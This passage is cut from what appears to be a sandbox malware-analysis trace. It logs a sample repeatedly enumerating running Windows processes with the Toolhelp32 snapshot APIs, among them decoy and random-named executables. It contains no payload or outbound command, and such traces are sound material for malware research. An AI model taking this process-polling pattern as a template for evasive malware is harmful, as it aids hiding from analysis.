doctrine.exe")) returned 1 [0116.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0116.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0116.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0116.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0116.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0116.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0116.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0116.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0116.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0116.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.895] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0116.896] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0116.897] CloseHandle (hObject=0xbc) returned 1 [0116.897] Sleep (dwMilliseconds=0x12c) [0117.209] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0117.214] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0117.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0117.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0117.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0117.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0117.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0117.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0117.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0117.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0117.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.230] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0117.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0117.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0117.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0117.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0117.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0117.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0117.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0117.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0117.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0117.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0117.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0117.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0117.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0117.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0117.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0117.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0117.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0117.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0117.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0117.324] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0117.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0117.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0117.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0117.331] CloseHandle (hObject=0xc4) returned 1 [0117.331] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0117.337] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0117.339] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0117.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0117.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0117.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0117.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0117.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0117.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, 